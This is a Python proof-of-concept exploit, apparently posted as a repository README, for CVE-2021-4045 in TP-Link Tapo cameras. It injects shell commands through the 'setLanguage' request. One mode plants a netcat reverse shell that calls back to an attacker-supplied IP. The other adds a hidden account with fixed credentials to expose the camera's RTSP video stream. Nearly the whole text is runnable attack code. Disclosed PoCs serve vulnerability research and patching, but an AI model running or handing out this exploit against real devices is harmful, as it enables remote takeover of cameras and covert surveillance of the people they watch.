README.md
Rendering markdown...
import requests, urllib3, sys, threading, os, hashlib, time
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
PORT = 1337
REVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f'
NC_COMMAND = 'nc -lp %d' % PORT
RTSP_USER = 'pwned1337'
RTSP_PASSWORD = 'pwned1337'
RTSP_CIPHERTEXT = 'RUW5pUYSBm4gt+5T7bzwEq5r078rcdhSvpJrmtqAKE2mRo8bvvOLfYGnr5GNHfANBeFNEHhucnsK86WJTs4xLEZMbxUS73gPMTYRsEBV4EaKt2f5h+BkSbuh0WcJTHl5FWMbwikslj6qwTX48HasSiEmotK+v1N3NLokHCxtU0k='
print(r"""
CVE-2021-4045 PoC _ @hacefresko
_ ____ ___ __ | |_ __ _ _ __ ___
| '_ \ \ /\ / / '_ \| __/ _` | '_ \ / _ \
| |_) \ V V /| | | | || (_| | |_) | (_) |
| .__/ \_/\_/ |_| |_|\__\__,_| .__/ \___/
|_| |_|
""")
if (len(sys.argv) < 4) or (sys.argv[1] != 'shell' and sys.argv[1] != 'rtsp'):
print("[x] Usage: python3 pwnTapo.py [shell|rtsp] [victim_ip] [attacker_ip]")
print()
exit()
victim = sys.argv[2]
attacker = sys.argv[3]
url = "https://" + victim + ":443/"
if sys.argv[1] == 'shell':
print("[+] Listening on port %d..." % PORT)
t = threading.Thread(target=os.system, args=(NC_COMMAND,))
t.start()
time.sleep(2)
print("[+] Sending reverse shell to %s...\n" % victim)
json = {"method": "setLanguage", "params": {"payload": "';" + REVERSE_SHELL % (attacker, PORT) + ";'"}}
requests.post(url, json=json, verify=False)
elif sys.argv[1] == 'rtsp':
print("[+] Setting up RTSP video stream...")
md5_rtsp_password = hashlib.md5(RTSP_PASSWORD.encode()).hexdigest().upper()
json = {"method": "setLanguage", "params": {"payload": "';uci set user_management.third_account.username=%s;uci set user_management.third_account.passwd=%s;uci set user_management.third_account.ciphertext=%s;uci commit user_management;/etc/init.d/cet terminate;/etc/init.d/cet resume;'" % (RTSP_USER, md5_rtsp_password, RTSP_CIPHERTEXT)}}
requests.post(url, json=json, verify=False)
print("[+] RTSP video stream available at rtsp://%s/stream2" % victim)
print("[+] RTSP username: %s" % RTSP_USER)
print("[+] RTSP password: %s" % RTSP_PASSWORD)